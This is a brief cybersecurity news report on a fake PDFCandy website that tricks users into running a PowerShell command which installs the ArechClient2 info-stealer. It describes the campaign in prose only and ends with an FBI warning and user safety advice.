141/68 Thursday, April 17, 2025
Cybersecurity researchers at CloudSEK have uncovered a sophisticated malware campaign involving a fake version of the legitimate site PDFCandy[.]com, designed to trick users into downloading ArechClient2, an info-stealing malware from the SectopRAT family active since 2019. The campaign relies on malicious Google Ads and fake software update prompts to distribute the malware stealthily, with the primary goal of stealing browser-stored credentials and personal information.
The fake site closely mimics the legitimate PDFCandy interface, using a similar domain name and identical design to deceive users. Upon visiting the spoofed site, users are prompted to upload a PDF file for conversion to DOCX. The page displays a fake loading animation and a fake CAPTCHA, which helps build credibility while advancing the attacker’s social engineering strategy. Victims are then instructed to run a PowerShell command, which downloads a malicious file named “adobe[.]zip”. This archive contains an executable named “audiobitexe”, which deploys the ArechClient2 malware onto the victim’s system.
The FBI previously issued a warning on March 17, 2025, about cybercriminals exploiting online file conversion services to spread malware. These bad actors often target users of free tools for converting files or downloading media, such as PDFs, DOCX, MP3s, and videos. Users are strongly advised to scrutinize URLs carefully before uploading any files, avoid following suspicious prompts, and never execute unknown scripts or downloads, especially from sites offering free online services. Failure to do so may result in silent infection by malware capable of stealing sensitive data.
Source https://hackread.com/fake-pdfcandy-websites-spread-malware/
